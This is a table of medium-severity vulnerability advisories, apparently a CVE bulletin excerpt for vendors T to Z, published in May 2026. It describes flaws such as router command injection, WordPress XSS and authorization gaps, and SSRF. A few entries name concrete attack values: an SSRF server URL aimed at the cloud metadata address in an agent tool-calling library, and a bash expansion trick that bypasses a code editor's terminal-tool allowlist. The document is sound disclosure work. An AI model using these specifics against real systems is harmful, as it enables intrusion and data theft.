| Synology--Synology Assistant | An origin validation error vulnerability in Synology Assistant before 7.0.6-50085 allows local users to write arbitrary files with restricted content during installation. | 2026-05-27 | 6.1 | CVE-2025-66593 |
| Synology--Synology Contacts | Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in contact functionality in Synology Contacts before 1.0.10-20659 allows remote authenticated users to read or write specific files containing non-sensitive information via unspecified vectors. | 2026-05-27 | 5.4 | CVE-2025-13167 |
| TaleLin--lin-cms-spring-boot | A vulnerability was detected in TaleLin lin-cms-spring-boot up to 0.2.1. This issue affects some unknown processing of the file src/main/java/io/github/talelin/latticy/controller/v1/BookController.java of the component book Endpoint. The manipulation results in improper access controls. The attack may be launched remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-30 | 6.3 | CVE-2026-10152 |
| Tanium--Tanium Server | Tanium addressed a denial of service vulnerability in Tanium Server. | 2026-05-27 | 6.5 | CVE-2026-9156 |
| teableio--teable | A vulnerability was identified in teableio teable up to 1.9.x. This impacts an unknown function of the file apps/nextjs-app/src/features/auth/pages/LoginPage.tsx of the component Sign-up. The manipulation of the argument redirect leads to cross site scripting. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. Upgrading to version release.2026-04-21T08-57-20Z.1513 will fix this issue. The affected component should be upgraded. The vendor confirms: "The default branch of teableio/teable is develop, and the reported login redirect issue has already been fixed there. The login redirect flow now validates the redirect parameter with isValidRedirectPath() before navigation, which blocks javascript:, data:, and cross-origin redirects." | 2026-05-26 | 4.3 | CVE-2026-9566 |
| TeamSpeak--TeamSpeak 3 Server | A weakness has been identified in TeamSpeak 3 Server up to 3.13.7. This affects the function process_resend_queue of the component Connection State Management. This manipulation causes use after free. The attack may be initiated remotely. Upgrading to version 3.13.8 is able to mitigate this issue. The affected component should be upgraded. | 2026-05-27 | 5.4 | CVE-2026-4390 |
| TeamSpeak--TeamSpeak 3 Server | A security vulnerability has been detected in TeamSpeak 3 Server up to 3.13.7. This vulnerability affects unknown code of the component ECC Key Parser. Such manipulation leads to heap-based buffer overflow. The attack may be launched remotely. Upgrading to version 3.13.8 is able to resolve this issue. It is suggested to upgrade the affected component. | 2026-05-27 | 5.3 | CVE-2026-4391 |
| TeamSpeak--TeamSpeak 3 Server | A vulnerability was detected in TeamSpeak 3 Server up to 3.13.7. This issue affects some unknown processing of the component clientek Handshake Handler. Performing a manipulation of the argument proof results in reachable assertion. Remote exploitation of the attack is possible. Upgrading to version 3.13.8 is capable of addressing this issue. Upgrading the affected component is recommended. | 2026-05-27 | 5.3 | CVE-2026-4392 |
| TeconceTheme--Mayosis Core | Missing Authorization vulnerability in TeconceTheme Mayosis Core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Mayosis Core: from n/a through 5.4.7. | 2026-05-26 | 5.3 | CVE-2026-39655 |
| Tenda--W12 | A vulnerability was found in Tenda W12 3.0.0.7(4763). This issue affects the function cgiSysWebTimeoutSet of the file /bin/httpd of the component Web Management Interface. The manipulation of the argument web_over_time results in denial of service. It is possible to launch the attack remotely. The exploit has been made public and could be used. | 2026-05-31 | 6.5 | CVE-2026-10190 |
| Themeansar--Newses | Missing Authorization vulnerability in Themeansar Newses allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Newses: from n/a through 2.0.0.77. | 2026-05-25 | 5.4 | CVE-2026-24586 |
| ThemeHigh--Stripe Payment Gateway for WooCommerce | Authentication Bypass Using an Alternate Path or Channel vulnerability in ThemeHigh Stripe Payment Gateway for WooCommerce allows Password Recovery Exploitation. This issue affects Stripe Payment Gateway for WooCommerce: from n/a through 5.0.7. | 2026-05-25 | 6.5 | CVE-2026-45217 |
| themeisle--Visualizer: Tables and Charts Manager for WordPress | The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.11.14. This is due to a missing capability check on the renderChartPages() and uploadData() functions, where the wp_ajax_visualizer-create-chart and wp_ajax_visualizer-edit-chart AJAX actions invoke renderChartPages() without any current_user_can() check, and wp_ajax_visualizer-upload-data invokes uploadData() which also lacks a capability check and validates its nonce without an action argument, making it trivially bypassable. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary chart posts and access or modify chart data belonging to other users, including administrators. | 2026-05-28 | 4.3 | CVE-2026-8689 |
| themesuite--Automotive Car Dealership Business WordPress Theme | The Automotive Car Dealership Business WordPress Theme for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Project Details' custom field in Portfolio Items in all versions up to, and including, 13.4.1. This is due to insufficient input sanitization and output escaping on user-supplied attributes in the 'project_details' custom field. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-29 | 6.4 | CVE-2025-14042 |
| ThingsBoard--ThingsBoard | A weakness has been identified in ThingsBoard up to 4.3.1.1. Affected by this vulnerability is the function getGatewayDockerComposeFile of the file /api/v1/provision of the component YAML Handler. This manipulation causes code injection. It is possible to initiate the attack remotely. The attack's complexity is rated as high. The exploitation appears to be difficult. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-26 | 5 | CVE-2026-9568 |
| thomstark--Formidable Kinetic | The Formidable Kinetic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'kinetic_link' shortcode in versions up to, and including, 1.1.01. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes (notably 'window', 'class', and 'label') in the FrmKinetic::link() function, which are concatenated directly into HTML attributes of an anchor tag. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8871 |
| Tiandy--Easy7 Integrated Management Platform | A vulnerability was determined in Tiandy Easy7 Integrated Management Platform 7.17.0. This issue affects some unknown processing of the file /rest/user/updateUserPassword of the component API Endpoint. Executing a manipulation can lead to weak password recovery. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 5.3 | CVE-2026-9466 |
| Tom--GenerateBlocks | Insertion of Sensitive Information Into Sent Data vulnerability in Tom GenerateBlocks allows Retrieve Embedded Sensitive Data. This issue affects GenerateBlocks: from n/a through 2.1.0. | 2026-05-27 | 6.5 | CVE-2026-48877 |
| Totolink--CA750-PoE | A vulnerability was identified in Totolink CA750-PoE 6.2c.510. This affects the function setWebWlanIdx of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Such manipulation of the argument webWlanIdx leads to os command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2026-05-25 | 6.3 | CVE-2026-9511 |
| Totolink--CA750-PoE | A security flaw has been discovered in Totolink CA750-PoE 6.2c.510. This vulnerability affects the function setPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Performing a manipulation of the argument admuser/admpass results in os command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-25 | 6.3 | CVE-2026-9512 |
| Totolink--CA750-PoE | A weakness has been identified in Totolink CA750-PoE 6.2c.510. This issue affects the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Executing a manipulation of the argument host_time can lead to os command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-25 | 6.3 | CVE-2026-9513 |
| Totolink--CA750-PoE | A security vulnerability has been detected in Totolink CA750-PoE 6.2c.510. Impacted is the function setNetworkDiag of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The arguments NetDiagHost/NetDiagPingNum/NetDiagPingSize/NetDiagPingTimeOut/NetDiagTracertHop are passed directly from attacker-controlled input, so their manipulation leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-05-25 | 6.3 | CVE-2026-9514 |
| Totolink--CA750-PoE | A vulnerability was detected in Totolink CA750-PoE 6.2c.510. The affected element is the function setUnloadUserData of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument plugin_version results in os command injection. The attack may be launched remotely. The exploit is now public and may be used. | 2026-05-25 | 6.3 | CVE-2026-9515 |
| Totolink--CA750-PoE | A weakness has been identified in Totolink CA750-PoE 6.2c.510. Impacted is the function setUpgradeUboot of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. This manipulation of the argument FileName causes os command injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-26 | 6.3 | CVE-2026-9531 |
| Totolink--CA750-PoE | A security vulnerability has been detected in Totolink CA750-PoE 6.2c.510. The affected element is the function setUploadUserData of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Such manipulation of the argument FileName leads to os command injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. | 2026-05-26 | 6.3 | CVE-2026-9532 |
| Totolink--CA750-PoE | A vulnerability was detected in Totolink CA750-PoE 6.2c.510. The impacted element is the function recvUpgradeNewFw of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Performing a manipulation of the argument fwUrl/magicid results in os command injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2026-05-26 | 6.3 | CVE-2026-9533 |
| Totolink--CA750-PoE | A flaw has been found in Totolink CA750-PoE 6.2c.510. This affects the function setWiFiWpsConfig of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Executing a manipulation of the argument PIN can lead to os command injection. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2026-05-26 | 6.3 | CVE-2026-9534 |
| TRENDnet--TEW-432BRP | A vulnerability has been found in TRENDnet TEW-432BRP 3.10B20. This impacts the function formSetRoute of the file /goform/formSetRoute. The manipulation of the argument ip/mask/gateway leads to command injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 6.3 | CVE-2026-10060 |
| TRENDnet--TEW-432BRP | A vulnerability was found in TRENDnet TEW-432BRP 3.10B20. Affected is the function formWPS of the file /goform/formWPS. The manipulation of the argument peerPin results in command injection. The attack can be executed remotely. The exploit has been made public and could be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 6.3 | CVE-2026-10061 |
| TRENDnet--TEW-432BRP | A security flaw has been discovered in TRENDnet TEW-432BRP 3.10B20. This affects the function formSetPortTr of the file /goform/formSetPortTr. Performing a manipulation of the argument special_name results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 6.3 | CVE-2026-10064 |
| TRENDnet--TEW-432BRP | A vulnerability has been found in TRENDnet TEW-432BRP 3.10B20. Impacted is the function formSysCmd of the file /goform/formSysCmd. Such manipulation of the argument sysCmd leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 6.3 | CVE-2026-10180 |
| TRENDnet--TEW-432BRP | A vulnerability was determined in TRENDnet TEW-432BRP 3.10B20. The impacted element is the function formWlanSetup of the file /goform/formWlanSetup. Executing a manipulation of the argument enrollee can lead to command injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 6.3 | CVE-2026-10182 |
| universal-tool-calling-protocol--typescript-utcp | typescript-utcp is a typescript implementation of UTCP. Prior to 1.1.2, the @utcp/http package is vulnerable to a blind Server-Side Request Forgery (SSRF) caused by a trust-boundary inconsistency between manual discovery and tool invocation. registerManual() validates the discovery URL against an HTTPS / loopback allowlist, but callTool() reuses the resolved toolCallTemplate.url directly without revalidating, and the OpenApiConverter blindly trusts whatever servers[0].url an attacker-hosted spec declares. An attacker who hosts a malicious OpenAPI spec on a legitimate HTTPS endpoint can declare e.g. servers: [{ url: "http://127.0.0.1:9090" }] or servers: [{ url: "http://169.254.169.254" }]; the converter then produces tools whose URL points at internal services on the agent host. This vulnerability is fixed in 1.1.2. | 2026-05-28 | 4.7 | CVE-2026-45366 |
| VideoWhisper.com--Paid Videochat Turnkey Site | Missing Authorization vulnerability in VideoWhisper.Com Paid Videochat Turnkey Site allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Paid Videochat Turnkey Site: from n/a through 7.3.23. | 2026-05-26 | 5.3 | CVE-2026-24590 |
| ViewComponent--view_component | view_component is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. From 3.0.0 to 4.9.0, the preview route derives an example name from the URL and calls it with public_send. The code does not verify that the requested method is one of the preview examples explicitly defined by the preview class. As a result, inherited public methods on ViewComponent::Preview are route-reachable. The most important one is render_with_template, which accepts template: and locals:. Those values can come from request params and are later passed to Rails as render template:. If previews are exposed, an attacker can render internal Rails templates that are not otherwise routable. This vulnerability is fixed in 4.9.0. | 2026-05-26 | 6.5 | CVE-2026-44836 |
| ViewComponent--view_component | view_component is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. From 3.0.0 to 4.9.0, the system test entrypoint canonicalizes a user-controlled file path with File.realpath, then checks whether the resolved path starts with the temp directory path. This is not a safe containment check because sibling directories can share the same string prefix. This vulnerability is fixed in 4.9.0. | 2026-05-26 | 5.9 | CVE-2026-44837 |
| vinaysankhyan--iWR Tooltip | The iWR Tooltip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `iwrtooltip` shortcode in versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user supplied attributes in the iwr_tooltip() shortcode handler - the `title` attribute is concatenated directly into an HTML attribute without esc_attr() or any other escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8894 |
| vincentastolfi--Shortcode Buddy | The Shortcode Buddy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 0.1.9.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8897 |
| vllm-project--vllm | A vulnerability was identified in vllm-project vllm 0.19.0. This issue affects some unknown processing of the component OpenAI-compatible Serving Path. Such manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The pull request to fix this issue awaits acceptance. | 2026-05-26 | 5.3 | CVE-2026-9540 |
| volcano-sh--volcano | Volcano is a Kubernetes-native batch scheduling system. Prior to v1.14.2, v1.13.3, and v1.12.4, the Volcano webhook server does not enforce a size limit on incoming HTTP request bodies. Any in-cluster pod that can reach the webhook endpoint may send an arbitrarily large request body, potentially causing the webhook server to be killed by OOM. All Volcano deployments with the webhook server exposed to in-cluster traffic are affected. This vulnerability is fixed in v1.14.2, v1.13.3, and v1.12.4. | 2026-05-27 | 6.8 | CVE-2026-44247 |
| VowpalWabbit--vowpal_wabbit | Vowpal Wabbit is a machine learning system. The workflow .github/workflows/python_checks.yml embeds ${{ github.event.pull_request.title }} directly inside double-quoted bash strings in four separate steps across four jobs, each passing it as a CLI argument to the Python test script run_tests_model_gen_and_load.py. The shell interprets the expanded string before invoking Python, allowing an attacker to break out of the quotes and execute arbitrary commands on the runner. The pull_request trigger fires on PRs targeting any branch (branches: ['*']), with no additional access gate. This vulnerability is fixed by the 998e390e80a7e8192d7849b7784bc113dbd190ad commit. | 2026-05-26 | 5 | CVE-2026-44723 |
| Webful Creations--RepairBuddy | Missing Authorization vulnerability in Webful Creations RepairBuddy allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects RepairBuddy: from n/a through 4.1121. | 2026-05-26 | 4.3 | CVE-2026-24638 |
| Webmin--Webmin | Webmin before 2.640 allows mailboxes/detach.cgi XSS via an SVG document attachment that is viewed in the mailboxes component, because image/svg+xml is used instead of a safe type (e.g., text/plain). | 2026-05-27 | 6.1 | CVE-2026-49102 |
| WebToffee--Product Import Export for WooCommerce | Missing Authorization vulnerability in WebToffee Product Import Export for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Product Import Export for WooCommerce: from n/a through 2.5.6. | 2026-05-27 | 4.3 | CVE-2026-48971 |
| westboy--CicadasCMS | A flaw has been found in westboy CicadasCMS up to 2431154dac8d0735e04f1fd2a3c3556668fc8dab. Impacted is the function Search of the file org/springframework/cache/support/AbstractCacheManager.java. This manipulation of the argument s causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been published and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-30 | 4.3 | CVE-2026-10153 |
| wikidforum--Wikidforum | Wikidforum 2.20 contains a cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted HTML in the reply_text parameter. Attackers can post comments containing JavaScript code through the rpc.php endpoint that executes in other users' browsers when viewing forum replies. | 2026-05-29 | 5.4 | CVE-2018-25384 |
| Wireshark Foundation--Wireshark | ROHC protocol dissector crash in Wireshark 4.6.0 to 4.6.5 and 4.4.0 to 4.4.15 allows denial of service. | 2026-05-27 | 5.5 | CVE-2026-9759 |
| wmark--CDN Linker lite | The CDN Linker lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on the ossdl_off_options() function. This makes it possible for unauthenticated attackers to update the plugin's settings - including the CDN URL used to rewrite all static asset references on the site - via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-8941 |
| WP Chill--RSVP and Event Management | Missing Authorization vulnerability in WP Chill RSVP and Event Management allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects RSVP and Event Management: from n/a through 2.7.16. | 2026-05-25 | 5.3 | CVE-2026-27398 |
| WP Media--Adminimize | Missing Authorization vulnerability in WP Media Adminimize allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Adminimize: from n/a through 1.11.11. | 2026-05-27 | 4.3 | CVE-2026-49045 |
| WP Sunshine--Sunshine Photo Cart | Missing Authorization vulnerability in WP Sunshine Sunshine Photo Cart allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sunshine Photo Cart: from n/a through 3.6.7. | 2026-05-25 | 6.3 | CVE-2026-42776 |
| WP Wham--Checkout Files Upload for WooCommerce | Authorization Bypass Through User-Controlled Key vulnerability in WP Wham Checkout Files Upload for WooCommerce checkout-files-upload-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Checkout Files Upload for WooCommerce: from n/a through <= 2.2.5. | 2026-05-27 | 6.5 | CVE-2026-42725 |
| WpDevArt--Organization chart | Cross-Site Request Forgery (CSRF) vulnerability in WpDevArt Organization chart allows Cross Site Request Forgery. This issue affects Organization chart: from n/a through 1.7.5. | 2026-05-25 | 4.3 | CVE-2026-24597 |
| wpdevelop--Booking Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdevelop Booking Manager booking-manager allows Stored XSS. This issue affects Booking Manager: from n/a through <= 2.1.18. | 2026-05-27 | 6.5 | CVE-2026-42751 |
| wpengine--Advanced Custom Fields (ACF) | The Advanced Custom Fields (ACF®) plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 6.8.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to overwrite the post_title and post_content of any post bound to a publicly accessible acf_form() instance by injecting values into the _post_title and _post_content parameters of a form submission request. | 2026-05-31 | 5.3 | CVE-2026-8382 |
| wpeverest--Everest Forms Contact Form, Payment Form, Quiz, Survey & Custom Form Builder | The Everest Forms - Contact Form, Payment Form, Quiz, Survey & Custom Form Builder plugin for WordPress is vulnerable to unauthorized email sending due to a missing capability check on the send_test_email() function in all versions up to, and including, 3.4.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to send test emails to arbitrary addresses from the server. | 2026-05-27 | 4.3 | CVE-2026-4888 |
| wpeverest--User Registration & Membership Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder | The User Registration & Membership - Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.5. This is due to missing ownership validation on a user-controlled attachment ID, allowing the plugin to store and subsequently delete arbitrary media attachments without verifying that the referenced attachment belongs to the requesting user. This makes it possible for authenticated attackers, with subscriber-level access and above, to permanently delete arbitrary media attachments uploaded by any other user, including administrators. | 2026-05-28 | 5.3 | CVE-2026-7651 |
| Wpmet--ElementsKit Elementor addons Lite | Missing Authorization vulnerability in Wpmet ElementsKit Elementor addons Lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ElementsKit Elementor addons Lite: from n/a through 3.9.6. | 2026-05-27 | 5.3 | CVE-2026-49053 |
| Wpmet--ElementsKit Elementor addons Lite | Missing Authorization vulnerability in Wpmet ElementsKit Elementor addons Lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ElementsKit Elementor addons Lite: from n/a through 3.9.6. | 2026-05-27 | 4.3 | CVE-2026-49052 |
| WPPOOL--FlexTable | Missing Authorization vulnerability in WPPOOL FlexTable allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects FlexTable: from n/a through 3.24.0. | 2026-05-25 | 4.3 | CVE-2026-24582 |
| WPXpro--Xpro Elementor Addons - Pro | The Xpro Elementor Addons - Pro plugin for WordPress is vulnerable to Arbitrary File Reading in all versions up to, and including, 1.4.7 via the Draw SVG widget. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2026-05-27 | 6.5 | CVE-2025-0898 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, EpgParser.php, plugin/AI/receiveAsync.json.php, and other locations do not use the $resolvedIP out-param of isSSRFSafeURL() for DNS pinning via CURLOPT_RESOLVE, opening DNS-rebinding TOCTOU. | 2026-05-29 | 6.5 | CVE-2026-45619 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, there is a stored cross-site scripting vulnerability. The Live plugin's "YouTube-style" view renders the live transmission's stream key into an HTML class attribute by raw echo, without htmlspecialchars(). A canStream user can persist a key containing " plus an event handler via plugin/Live/saveLive.php, and any visitor (logged in or anonymous) opening the stream's live page executes attacker JavaScript in the platform origin. | 2026-05-29 | 5.4 | CVE-2026-45580 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, there is a cross-site request forgery vulnerability on the 2FA toggle. plugin/LoginControl/set.json.php accepts POST type=set2FA value=false, calls LoginControl::setUser2FA(User::getId(), false) on the session-authenticated user, and returns. There is no forbidIfIsUntrustedRequest() call, no isTokenValid() check, no X-CSRF-Token/SameSite enforcement, and no re-authentication step. A cross-origin page that the victim visits while logged into the AVideo dashboard issues the POST via a hidden form (or fetch without credentials:"omit") and disables the victim's 2FA in one request. | 2026-05-29 | 5.7 | CVE-2026-45610 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, objects/mention.json.php has no User::loginCheck() or admin gate. It only has an entry guard: preg_match('/^@/', $_REQUEST['term']) and hard-coded rowCount=10. This enables unauthenticated user enumeration. | 2026-05-29 | 5.3 | CVE-2026-45620 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, AVideo stores category descriptions from user input and later renders category_description as raw HTML in the Gallery view. A user who can create or edit categories can store JavaScript in a category description, which executes when another user views the affected Gallery/category page. This is a stored XSS in the category description field, separate from previously fixed XSS issues in video titles or comments. | 2026-05-29 | 5.4 | CVE-2026-47694 |
| xianrendzw--EasyReport | A flaw has been found in xianrendzw EasyReport up to 2.0.17.0522_Beta. Affected by this issue is the function execute of the component REST Endpoint. Executing a manipulation of the argument reportParams can lead to sql injection. The attack can be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 6.3 | CVE-2026-9524 |
| XX-net--XX-Net | XX-Net V5.16.6 contains a WebSocket frame parsing vulnerability in the WebSocket_receive_worker routine of simple_http_server.py that allows attackers to cause corrupted application data by sending unmasked WebSocket frames. The server unconditionally reads 4 bytes as a masking key regardless of whether the MASK bit is set in the frame header, causing the first 4 bytes of payload to be consumed as a mask key and the remaining payload to be incorrectly XOR-decoded, resulting in data corruption alongside missing RSV bit, opcode, and FIN fragmentation validations. | 2026-05-29 | 4 | CVE-2026-10099 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.7, the SSE event server bound to 0.0.0.0:5553 on Linux/macOS by default because the platform-dependent host default in engine/flags.go:39-46 set host = "" for non-Windows, and utils.JoinHostPort("", ":5553") resolves to ":5553". This vulnerability is fixed in 1.17.7. | 2026-05-26 | 4.3 | CVE-2026-46430 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.7, the SSE event server's Access-Control-Allow-Origin response header was hardcoded to the wildcard * regardless of the caller's Origin. Because EventSource does not preflight and does not send cookies, the wildcard is sufficient to let any third-party page the developer visits open a cross-origin EventSource to the SSE port and read the live filename stream from JavaScript. This vulnerability is fixed in 1.17.7. | 2026-05-26 | 4.3 | CVE-2026-46431 |
| yashpokharna2555--StudentManagementSystem | A vulnerability was found in yashpokharna2555 StudentManagementSystem cb2f558ddf8d19396de0f92abf2d224d46a0a203. This impacts an unknown function of the file courseDel.php. The manipulation of the argument ID results in improper control of resource identifiers. The attack may be performed from remote. The exploit has been made public and could be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 5.4 | CVE-2026-9438 |
| yehudah--faq shortocde | The faq shortocde plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'color' shortcode attribute in the 'faq' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8040 |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.43.4, negative chunk-size in chunked Transfer-Encoding causes unbounded memory allocation and process crash. The ChunkedDecoder::read_payload function in cpp-httplib (httplib.h) parses the chunk-size field of HTTP chunked transfer encoding using std::strtoul(). Per the C standard (§7.22.1.4), strtoul silently accepts a leading minus sign, performing unsigned wrap-around: strtoul("-2", …, 16) returns ULONG_MAX − 1 (0xFFFFFFFFFFFFFFFE). The library's only guard (line 12833) rejects ULONG_MAX (the result of "-1"), but any other negative value such as "-2" passes validation. The resulting near-maximum value is stored in chunk_remaining and controls how many bytes the server's read loop consumes from the network. This vulnerability is fixed in 0.43.4. | 2026-05-29 | 5.3 | CVE-2026-45352 |
| yoast--Yoast SEO Advanced SEO with real-time guidance and built-in AI | The Yoast SEO plugin for WordPress is vulnerable to Insecure Direct Object References in all versions up to, and including, 26.5. This is due to insufficient authorization checks in the Meta Search REST API endpoint that fail to verify post ownership. This makes it possible for authenticated attackers, with Contributor-level access and above, to read sensitive SEO metadata from any post on the site via the 'post_id' parameter, including posts owned by other users, private posts, and draft posts. | 2026-05-27 | 4.3 | CVE-2025-14481 |
| youtag--Two-factor authentication (formerly IP Vault) | The Two-factor authentication (formerly IP Vault) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1. This is due to missing or incorrect nonce validation on the ipv_save_changes function. This makes it possible for unauthenticated attackers to modify the plugin's firewall and two-factor authentication settings - including the operating mode, request include/exclude rules, authentication slug, and log retention period - potentially disabling protection entirely via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-8903 |
| YunaiV--yudao-cloud | A vulnerability has been found in YunaiV yudao-cloud 2026.03. This affects the function IotDataSinkHttpConfig of the file /admin-api/iot/data-sink/create of the component Admin API Endpoint. Such manipulation leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 4.7 | CVE-2026-9464 |
| zed-industries--zed | Zed is a code editor. Prior to 0.229.0, Zed's terminal tool permission system can be bypassed via bash variable expansion chaining (${var@P}), allowing arbitrary command execution under an allowlisted command prefix. This vulnerability is fixed in 0.229.0. | 2026-05-28 | 6.4 | CVE-2026-44462 |
| zephyrproject-rtos--Zephyr | The SocketCAN implementation validates the length of a user-provided buffer containing a socketcan_frame object using only a NET_ASSERT statement in zcan_sendto_ctx() before dereferencing it in socketcan_to_can_frame(). In production builds where assertions are disabled, a userspace application that controls the length passed to a sendto syscall can supply an incomplete or truncated frame, causing socketcan_to_can_frame() to dereference fields beyond the end of the buffer. This results in an out-of-bounds read that can cause denial-of-service crashes or, because the parsed frame contents are transmitted on the network, leak adjacent memory. | 2026-05-30 | 6.1 | CVE-2026-5071 |
| Zohocorp--Zoho Mail wordpress plugin | Zohocorp Zoho Mail wordpress plugin is vulnerable to Cross-Site request forgery (CSRF). This issue affects Zoho Mail wordpress plugin versions before 1.6.2. | 2026-05-26 | 5.7 | CVE-2026-8174 |
